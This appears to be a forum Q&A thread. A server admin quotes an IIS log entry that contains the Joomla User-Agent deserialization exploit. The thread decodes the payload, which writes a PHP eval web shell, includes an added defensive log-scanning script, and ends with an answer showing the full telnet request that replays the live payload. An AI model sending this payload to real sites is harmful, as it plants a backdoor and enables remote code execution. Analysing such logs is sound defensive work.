
My server recently was attacked by hackers trying to run code on a web site, and I would like to test what they were trying to do. I'm not sure how to build the telnet command to do this.

2016-06-09 17:02:11 192.168.1.1 GET / - 80 - 176.31.245.146 }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:870:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(116).chr(111).chr(109).chr(93).chr(41).chr(63).chr(62).chr(32).chr(60).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;} - 200 0 0 2609

date: 2016-06-09
time: 17:02:11
s-ip: 192.168.1.1
cs-method: GET
cs-uri-stem: /
cs-uri-query: -
s-port: 80
cs-username: -
cs-ip: 176.31.245.146
cs(User-Agent): }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:870:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(116).chr(111).chr(109).chr(93).chr(41).chr(63).chr(62).chr(32).chr(60).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
cs(Referer): -
sc-status: 200
sc-substatus: 0
sc-win32-status: 0 
time-taken: 2609

The eval code decodes to this:

<?php fputs(fopen($_SERVER['DOCUMENT_ROOT'] . '/includes.php', 'w'), '<?php eval($_POST[tom])?> <pppppppp>');

How do I make a telnet command using this information?

Thanks.

UltraJ
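For the defender's side of this log line, here is an added example (not code from the question or the answer): a Python script that parses IIS/W3C access-log lines like the one above, flags User-Agent values that carry the markers visible in this payload (a serialized PHP object, NUL-prefixed property names, eval/assert, a chr() concatenation chain) and decodes the chr() chain the same way the question's author did by hand. The sample log lines, the documentation-range IP addresses and the shortened stand-in payload (whose chain decodes to a harmless "echo 1;") are constructed for the example; the field names follow the question's own breakdown of the IIS default field list.

```python
"""Scan IIS/W3C access-log lines for PHP serialized-object payloads in the
User-Agent field and decode any chr() chain they carry.

Added example for log analysis; not code from the question or the answer.
"""
import re
from typing import Dict, List, Optional

# Constructed sample log in the W3C extended layout the question quotes.
# The first request carries a shortened stand-in for the serialized-object
# payload; its chr() chain decodes to the harmless statement "echo 1;".
# The second request is an ordinary browser hit. IPs are documentation ranges.
SAMPLE_LOG_LINES = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus "
    "sc-win32-status time-taken",
    r'2016-06-09 17:02:11 192.168.1.1 GET / - 80 - 198.51.100.23 '
    r'}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'
    r's:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":2:{'
    r's:8:"feed_url";s:65:"eval(chr(101).chr(99).chr(104).chr(111).chr(32).chr(49).chr(59));";'
    r's:19:"cache_name_function";s:6:"assert";}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}'
    r' - 200 0 0 2609',
    "2016-06-09 17:02:12 192.168.1.1 GET /index.php - 80 - 203.0.113.9 "
    "Mozilla/5.0+(Windows+NT+10.0)+Gecko/20100101+Firefox/47.0 - 200 0 0 15",
]

# (label, pattern) pairs; the labels are descriptive alert text chosen here,
# not names from any signature set.
INDICATORS = [
    ("serialized PHP object", re.compile(r'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')),
    # private/protected property names start with NUL bytes; logs may show
    # them as real NULs or as the escaped form "\0\0\0" seen in the question
    ("NUL-prefixed property name", re.compile(r'\\0\\0\\0|\x00')),
    ("eval/assert call", re.compile(r'\b(eval|assert)\b')),
    ("chr() concatenation chain", re.compile(r'(?:chr\(\d+\)\.){3,}chr\(\d+\)')),
]
CHR_RE = re.compile(r'chr\((\d{1,3})\)')


def parse_w3c(lines: List[str]) -> List[Dict[str, str]]:
    """Turn W3C extended log lines into dicts keyed by the #Fields names.

    Fields are space-delimited; IIS writes literal spaces inside a field as
    '+', so a clean line splits into exactly len(fields) tokens. Lines that
    do not are kept under a single '_malformed' key rather than dropped.
    """
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives such as #Software or #Date
        tokens = line.split(" ")
        if not fields or len(tokens) != len(fields):
            records.append({"_malformed": line})
            continue
        records.append(dict(zip(fields, tokens)))
    return records


def decode_chr_chain(text: str) -> str:
    """Rebuild the string a PHP chr(n).chr(n)... chain evaluates to."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(text))


def analyze_user_agent(ua: str) -> Dict[str, object]:
    """Match one User-Agent value against the indicators; decode any chain."""
    hits = [label for label, pat in INDICATORS if pat.search(ua)]
    decoded: Optional[str] = None
    if "chr() concatenation chain" in hits:
        decoded = decode_chr_chain(ua)
    return {"suspicious": bool(hits), "indicators": hits, "decoded": decoded}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request whose User-Agent shows payload markers."""
    findings: List[Dict[str, object]] = []
    for rec in parse_w3c(lines):
        result = analyze_user_agent(rec.get("cs(User-Agent)", ""))
        if result["suspicious"]:
            findings.append({
                "time": f'{rec.get("date")} {rec.get("time")}',
                "c-ip": rec.get("c-ip"),
                "uri": rec.get("cs-uri-stem"),
                "status": rec.get("sc-status"),
                "indicators": result["indicators"],
                "decoded": result["decoded"],
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f'{f["time"]} {f["c-ip"]} {f["uri"]} -> {", ".join(f["indicators"])}')
        if f["decoded"]:
            print("  decoded payload:", f["decoded"])
```

Run it over a real log by replacing SAMPLE_LOG_LINES with the file's lines; the sc-status field is kept in each finding because a 200 on a request like this, as in the question's line, is the signal that the server accepted the request rather than rejecting it, and the decoded string tells you which file the payload tried to write so you know where to look next.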

1 Answer


telnet yoursite.com 80

GET / HTTP/1.0
Host: yoursite.com
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:870:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(116).chr(111).chr(109).chr(93).chr(41).chr(63).chr(62).chr(32).chr(60).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

Terminated with 2 CR/LFs.

See: https://stackoverflow.com/questions/15772355/how-to-send-an-http-request-using-telnet

I was interested in how a User-Agent string could be used in an exploit, and found this, which you might be interested in reading: https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/.

Peter Stock